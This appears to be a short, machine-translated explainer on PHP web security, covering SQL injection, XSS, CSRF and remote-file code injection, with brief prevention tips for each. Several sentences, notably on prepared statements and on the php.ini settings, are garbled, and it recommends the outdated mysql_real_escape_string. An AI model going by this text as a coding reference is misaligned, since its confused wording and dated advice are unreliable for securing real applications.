SQL injection : the use of user input form fields in the way SQL statements to affect the normal SQL execution.
Prevented : Use the mysql_real_escape_string () to check whether the filtered data for each data manually to the correct use of prepared statements and bind a variable data type parameterized SQL: refers to the link in the design of the database and access data, the need to fill or data value where the parameter (parameter) to give the value, use @ or? To represent the parameters.
XSS attacks : cross-site scripting attacks, some of the data entered by the user to your site, including client-side scripting (usually JavaScript). If you do not have a filter on the output data to another web page, the script will be executed.
Prevent : In order to prevent XSS attacks, using PHP's htmlentities () function and then filter the output to the browser.
CSRF : Cross-site request forgery, refers to a page request sent, it looks like the site of a trusted user, but is forged
to prevent : In general, make sure that your form from the user, and match each one you send out form. There are two things we must remember: user sessions using appropriate safety measures, such as: to every session updating user id and use SSL. Another one-time generation token and its embedded form, save (a session variable), it is checked at the time of filing the session. As laravel of _token
Code injection : Code injection is the use of computer vulnerabilities caused by handling invalid data. The problem is, when you accidentally execute arbitrary code, usually through file contains. Badly written code can allow a remote file include and execute. As many PHP functions, such as require may contain a URL or file name.
Preventing code injection filtered user input is provided and Disable allow_url_fopen in php.ini allow_url_include. This disables require / include / fopen the remote file
